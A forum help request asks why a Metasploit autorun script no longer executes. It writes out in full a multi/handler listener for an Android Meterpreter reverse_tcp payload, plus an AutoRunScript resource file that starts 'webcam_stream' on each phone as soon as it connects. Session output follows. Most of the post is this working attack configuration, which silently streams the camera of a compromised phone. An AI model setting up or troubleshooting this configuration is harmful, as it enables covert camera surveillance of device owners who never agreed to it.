Ask A Question

Questions

Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Posted by Stephanie Coyle 10 days ago

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole:

Use exploit/multi/handler
Set payload android/meterpreter/ reverse_tcp
Set LHOST 192.168.0.240
Set LPORT 3460
Set ExitOnSession false
Set AutoRunScript multi_console_command -rc scriptcamandroid.rc
Exploit -j -z

In the Metasploit root, the file scriptcamandroid.rc has the following commands:

webcam_stream -i 2 -q 45 -d 84000
exit

After Metasploit opens the session, it automatically starts autorun with this multi console command:

Session ID 1 (192.168.0.240:3460 -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc'
Multi Command Execution Meterpreter Script Console

OPTIONS:

    -cl <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma.
    -h Help menu.
    -rc <opt> Text file with list of commands, one per line.
    -sl Hide commands for work in background sessions

The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly.

I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Loading comments...